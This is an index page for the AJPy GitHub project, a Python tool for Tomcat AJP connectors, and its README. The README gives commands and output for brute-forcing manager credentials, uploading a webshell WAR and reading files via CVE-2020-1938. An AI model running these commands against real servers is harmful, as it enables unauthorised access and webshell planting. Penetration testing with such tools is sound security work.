Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/hypn0s/AJPy
https://github.com/hypn0s/AJPy
cve-2020-1938 tomcat
Last synced: 21 days ago
JSON representation
- Host: GitHub
- URL: https://github.com/hypn0s/AJPy
- Owner: hypn0s
- License: bsd-3-clause
- Created: 2016-05-30T06:56:34.000Z (over 8 years ago)
- Default Branch: master
- Last Pushed: 2023-09-06T14:20:35.000Z (over 1 year ago)
- Last Synced: 2024-11-14T13:15:53.566Z (28 days ago)
- Topics: cve-2020-1938, tomcat
- Language: Python
- Size: 87.9 KB
- Stars: 465
- Watchers: 5
- Forks: 102
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-hacking-lists - hypn0s/AJPy - (Python)
README
# Intro
AJPy aims to craft AJP requests in order to communicate with AJP connectors.
Reference documentation: https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html
# Tools
At the moment, only one tool is provided for Tomcat with the following modules:
* version fingerprint
```
$ python tomcat.py version 172.17.0.2
Apache Tomcat/8.0.35
```* authentication bruteforce
```
$ python tomcat.py -v bf -U tomcat_mgr_default_users.txt -P tomcat_mgr_default_pass.txt /manager/html 172.17.0.2
[2016-06-10 17:24:55.965] INFO Attacking a tomcat at ajp13://172.17.0.2:8009/manager/html
[2016-06-10 17:24:56.017] DEBUG testing admin:admin
[2016-06-10 17:24:56.069] INFO Found valid credz: admin:admin
[2016-06-10 17:24:56.069] INFO Here is your cookie: JSESSIONID=1267BE97BFB5BFAEAFAAD76EE648FE06; Path=/manager/; HttpOnly
[2016-06-10 17:24:56.069] DEBUG testing admin:manager
[2016-06-10 17:24:56.152] DEBUG testing admin:role1
[2016-06-10 17:24:56.154] DEBUG testing admin:root
[2016-06-10 17:24:56.155] DEBUG testing admin:tomcat
[2016-06-10 17:24:56.157] DEBUG testing manager:admin
[2016-06-10 17:24:56.158] DEBUG testing manager:manager
[2016-06-10 17:24:56.159] DEBUG testing manager:role1
[2016-06-10 17:24:56.160] DEBUG testing manager:root
[2016-06-10 17:24:56.161] DEBUG testing manager:tomcat
[2016-06-10 17:24:56.164] DEBUG testing role1:admin
[2016-06-10 17:24:56.164] DEBUG testing role1:manager
[2016-06-10 17:24:56.165] DEBUG testing role1:role1
[2016-06-10 17:24:56.166] DEBUG testing role1:root
[2016-06-10 17:24:56.167] DEBUG testing role1:tomcat
[2016-06-10 17:24:56.169] DEBUG testing root:admin
[2016-06-10 17:24:56.170] DEBUG testing root:manager
[2016-06-10 17:24:56.171] DEBUG testing root:role1
[2016-06-10 17:24:56.172] DEBUG testing root:root
[2016-06-10 17:24:56.173] DEBUG testing root:tomcat
[2016-06-10 17:24:56.175] DEBUG testing tomcat:admin
[2016-06-10 17:24:56.175] DEBUG testing tomcat:manager
[2016-06-10 17:24:56.176] DEBUG testing tomcat:role1
[2016-06-10 17:24:56.177] DEBUG testing tomcat:root
[2016-06-10 17:24:56.178] DEBUG testing tomcat:tomcat
[2016-06-10 17:24:56.184] INFO Found valid credz: tomcat:tomcat
[2016-06-10 17:24:56.184] INFO Here is your cookie: JSESSIONID=9944126F31E428B8847AFEBF2307BB09; Path=/manager/; HttpOnly
[2016-06-10 17:24:56.184] DEBUG testing tomcat:sstic2016
[2016-06-10 17:24:56.186] DEBUG testing both:admin
[2016-06-10 17:24:56.187] DEBUG testing both:manager
[2016-06-10 17:24:56.188] DEBUG testing both:role1
[2016-06-10 17:24:56.189] DEBUG testing both:root
[2016-06-10 17:24:56.190] DEBUG testing both:tomcat
[2016-06-10 17:24:56.191] DEBUG Closing socket...
```* WAR upload
```
$ python tomcat.py upload -u tomcat -p tomcat webshell.war 172.17.0.2
```* WAR undeploy
```
$ python tomcat.py undeploy -u tomcat -p tomcat /webshell 172.17.0.2
```* Application listing
```
$ python tomcat.py list -u tomcat -p tomcat 172.17.0.2
```* Reading file using CVE-2020-1938
```
$ python tomcat.py read_file --webapp=examples /WEB-INF/web.xml 172.17.0.2
```# Thanks
* @MrTchuss for the Tomcat WAR upload fix
* @kalidor for the Tomcat WAR undeploy and application listing